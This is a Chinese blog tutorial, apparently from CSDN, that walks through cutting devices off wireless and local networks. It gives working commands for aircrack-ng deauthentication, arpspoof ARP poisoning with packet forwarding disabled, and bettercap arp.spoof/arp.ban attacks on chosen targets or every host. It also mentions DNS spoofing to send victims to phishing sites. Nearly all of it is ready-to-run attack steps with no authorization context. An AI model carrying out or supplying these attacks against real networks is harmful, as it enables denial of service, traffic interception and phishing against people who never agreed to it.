超级无敌详细之——wifiphisher/aircrack/bettercap/无线渗透-CSDN博客
1)第一个就是aircrack来断掉wifi,具体操作就和暴力破解wifi密码一样,在第四次握手包的时候会断掉wifi
airmon-ng start wlan0 //打开监听模式
airodump-ng wlan0mon -b a//扫描5Gwifi
iwconfig wlan0mon ch 信道(输入你选择wifi的信道,在扫描后可以看得到,那个ch就是信道)
aireplay-ng -0 0 -a 目标wifi地址 wlan0mon
2)其实上述方法并不是很好用,反正实践下来时可以时不行,我推荐是用arpspoof的方法也就是arp欺骗。
利用kali在同一个局域网内进行 ARP断网攻击_kali断网攻击-CSDN博客
这个博主就整理了还不错,总结一下就是用nmap扫描IP地址
然后这里我一般是会先让他不帮忙转发,输入
echo 0 > /proc/sys/net/ipv4/ip_forward
然后
arpspoof -i eth0(你自己的网卡) -t 目标ip 目标网关
但是这个成功与否还是很有多东西有关,比如说网卡能不能支持之类。
3)也是用arp,但是我们基于Bettercap来使用
我们输入bettercap
然后输入net.probe on
然后输入help arp.spoof
我们可以看到bettercap对于功能进行了描述,其实bettercap作为中间人攻击的一种手段有很多功能,比如说监听对方的流量走向,甚至dns.spoof可以实现把对方从比如说百度的网站变成自己的钓鱼网站之类。(但是随着时代进步,也存在了非常多的限制)
我们可以对所有频道进行攻击,也可以对于指定ip进行攻击
(1)所有频道:输入
set arp.spoof.fullduplex true
set arp.spoof.internal true
arp.ban on
(2)对于单个频道:输入
net.show
它可以像nmap一样列出有哪些ip,当然现在我在外面连接的自己的热点,所以只有我自己
如果在外出kali连接不了热点,可以看我这一篇配置的文章
然后
help arp.spoof
set arp.spoof.targets 目标ip, 目标网关 //要是连这两个都不知道还是别学了
arp.ban on
很明显目标ip是没办法连接互联网了,而且比2)要快。
大功告成
我说着很复杂的原因是因为我列举了很多方法,如果一个不行可以尝试多开。
下一个作品可以具体来讲讲bettercap或者meterpreter的一些实际操作